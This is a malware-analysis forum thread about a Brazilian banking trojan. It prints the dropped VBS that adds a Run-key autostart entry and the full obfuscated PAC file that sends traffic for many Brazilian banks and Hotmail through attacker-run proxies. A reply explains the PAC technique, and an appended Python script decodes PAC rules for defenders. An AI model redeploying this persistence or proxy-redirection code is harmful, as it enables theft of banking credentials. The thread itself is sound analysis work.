A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18684  by r3shl4k1sh
 Sun Mar 24, 2013 11:19 pm
I found this file a few days ago; it is a Banker according to VT https://www.virustotal.com/en/file/359b ... /analysis/

MD5: 4f68fc8ae042080a071a373dc54ef8b6
SH1: 359bdb0af9f84262cad461be389219ae062a3d699af51900cb3701086cde8620

This file is written using .NET (I assume), and after its first run it copies itself to the user's Application Data directory.
In addition it drops the following 3 files in the user's Temp folder:

cc.vbs
on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "ytf3shx9ppa"
strValue = """C:\Documents and Settings\Administrator\Application Data\VZ4qng1\KqHWnRl.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue

tfile.jsp
function FindProxyForURL(url, host)
{
//IPS
var iphot = "PROXY hota.tudoecology.com";
var nbebe = "PROXY noturno.tudoecology.com";
var ipd = "PROXY noturno.tudoecology.com";
var bosta = "PROXY noturno.tudoecology.com";
var ipsanta = "PROXY noturno.tudoecology.com";
var ipciti = "PROXY noturno.tudoecology.com";
var ipita = "PROXY noturno.tudoecology.com";
var iphsbc = "PROXY noturno.tudoecology.com";
var ipbanese = "PROXY noturno.tudoecology.com";
var ipserasa = "PROXY noturno.tudoecology.com";
var ipsicredi = "PROXY noturno.tudoecology.com";
var ipintouch = "PROXY noturno.tudoecology.com";
var ipbnb = "PROXY noturno.tudoecology.com";
var ipbrb = "PROXY noturno.tudoecology.com";
//Banco do Brasil
var pos1 = "*\x62"+""+"\x62*";
var tuvoa2 = "*\x62\x61\x6e\x63\x6f\x64\x6f\x62\x72\x61\x73\x69\x6c*";
if (shExpMatch(host, pos1)) {
return nbebe;
}
if (shExpMatch(host, tuvoa2)) {
return nbebe;
}
// Banese
var ban1 = "*\x62\x61\x6e\x65\x73\x65*";
if (shExpMatch(host, ban1)) {
return ipbanese;
}
// Caixa Economica Federal
var cef1 = "*cef*";
var cef2 = "*caixa*";
if (shExpMatch(host, cef1)) {
return bosta;
}
if (shExpMatch(host, cef2)) {
return bosta;
}
//HSBC
var hsbc1 = "*hsbc*";
if (shExpMatch(host, hsbc1)) {
return iphsbc;
}
//Sicredi
var sic1 = "*sicredi*";
if (shExpMatch(host, sic1)) {
return ipsicredi;
}
//BNB
var bnb1 = "*bnb*";
if (shExpMatch(host, bnb1)) {
return ipbnb;
}
//Citibank
var muki1 = "*citibank*";
if (shExpMatch(host, muki1)) {
return ipciti;
}
//Intouch
var int1 = "*intouch*";
if (shExpMatch(host, int1)) {
return ipintouch;
}
//Serasa
var ostra1 = "*serasa*";
if (shExpMatch(host, ostra1)) {
return ipserasa;
}
//SecureSSL
var foca1 = "*\x62\x72\x61\x64\x65\x73\x63\x6f*";
var ita1 = "*\x69\x74\x61\x75*";
var ssl1 = "*securessl*";
if (shExpMatch(host, ssl1)) {
return google.com.br;
}
//Bradesco
if (shExpMatch(host, foca1)) {
return ipd;
}
//Itau
if (shExpMatch(host, ita1)) {
return ipita;
}
//HOTMAIL
var hot1 = "*hotmail*";
if (shExpMatch(host, hot1)) {
return iphot;
}
//SANTA
var santa1 = "*santa";
var santa2 = "nder*";
var santa3 = santa1 + santa2;
var santa4 = "*real*";
if (shExpMatch(host, santa3)) {
return ipsanta;
}
if (shExpMatch(host, santa4)) {
return ipsanta;
}
return "DIRECT";
}

systemfile.txt
foi

As you can see, the vbs file writes a Run key entry in the registry so that it is started automatically.

I am trying to see this file in action, or at least make it produce network activity, but I am unable to do so.
Can someone give a short explanation of the purpose of the jsp file? Is this file injected into every page retrieved by the browser?


Edit: Attach file
Attachment (password: infected)
Last edited by EP_X0FF on Tue Mar 26, 2013 9:16 am, edited 1 time in total. Reason: renamed to be more descriptive
 #18687  by cjbi
 Mon Mar 25, 2013 10:36 am
r3shl4k1sh wrote: Can someone give a short explanation of the purpose of the jsp file? Is this file injected into every page retrieved by the browser?
It's a Proxy Auto Configuration (PAC) file.
A common technique used by a Brazilian banking malware.
[Image: PAC.gif, Internet Explorer LAN settings]
More information:
MSDN http://bit.ly/101rZ0C
Wikipedia http://en.wikipedia.org/wiki/Proxy_auto-config
FindProxyForURL http://findproxyforurl.com/example-pac-file/
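An added example, not code from the thread or the sample: a small static decoder for a PAC file of this shape. It resolves the var assignments (including the string concatenation and \xNN escapes that hide the bank names), lists each shExpMatch glob with the proxy it returns, flags returns that are bare identifiers (like the google.com.br line above, which would throw in a real PAC engine), and emulates the routing for a given hostname. The embedded PAC is a constructed, cut-down copy of the posted tfile.jsp with a placeholder proxy host.

```python
import re
from fnmatch import fnmatchcase
# Constructed, cut-down copy of the posted tfile.jsp: same idioms, placeholder proxy host.
SAMPLE_PAC = r'''function FindProxyForURL(url, host) {
var nbebe = "PROXY proxy.example.invalid";
var pos1 = "*\x62"+""+"\x62*";
var tuvoa2 = "*\x62\x61\x6e\x63\x6f\x64\x6f\x62\x72\x61\x73\x69\x6c*";
var ssl1 = "*securessl*";
var santa1 = "*santa";
var santa2 = "nder*";
var santa3 = santa1 + santa2;
if (shExpMatch(host, pos1)) { return nbebe; }
if (shExpMatch(host, tuvoa2)) { return nbebe; }
if (shExpMatch(host, ssl1)) { return google.com.br; }
if (shExpMatch(host, santa3)) { return nbebe; }
return "DIRECT";
}'''
VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*(.+?);')
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
RULE_RE = re.compile(r'shExpMatch\(\s*host\s*,\s*(\w+)\s*\)\s*\)\s*\{\s*return\s+([^;]+?)\s*;')
def decode(js_literal):
    # Expand the \xNN escapes used to keep bank names out of a plain grep.
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), js_literal)

def resolve_vars(pac):
    # Evaluate `var x = "lit" + "" + y;` assignments in order (literals here contain no '+').
    env = {}
    for name, expr in VAR_RE.findall(pac):
        parts = []
        for tok in (t.strip() for t in expr.split('+')):
            m = STR_RE.fullmatch(tok)
            parts.append(decode(m.group(1)) if m else env.get(tok, ''))
        env[name] = ''.join(parts)
    return env

def extract_rules(pac):
    # (glob pattern, proxy string returned, resolved?) in order; a bare identifier is unresolved.
    env, rules = resolve_vars(pac), []
    for pat_var, ret in RULE_RE.findall(pac):
        m = STR_RE.fullmatch(ret)
        target = decode(m.group(1)) if m else env.get(ret, ret)
        rules.append((env.get(pat_var, pat_var), target, bool(m) or ret in env))
    return rules

def route_for(host, rules):
    # Emulate shExpMatch with shell-style globbing; None marks a rule that would throw.
    for pattern, target, resolved in rules:
        if fnmatchcase(host, pattern):
            return target if resolved else None
    return "DIRECT"
```

Run extract_rules over the real tfile.jsp to get the full decoded list of targeted bank patterns for blocking or hunting, and route_for to confirm which hostnames the victim's browser would send through the attacker's proxy.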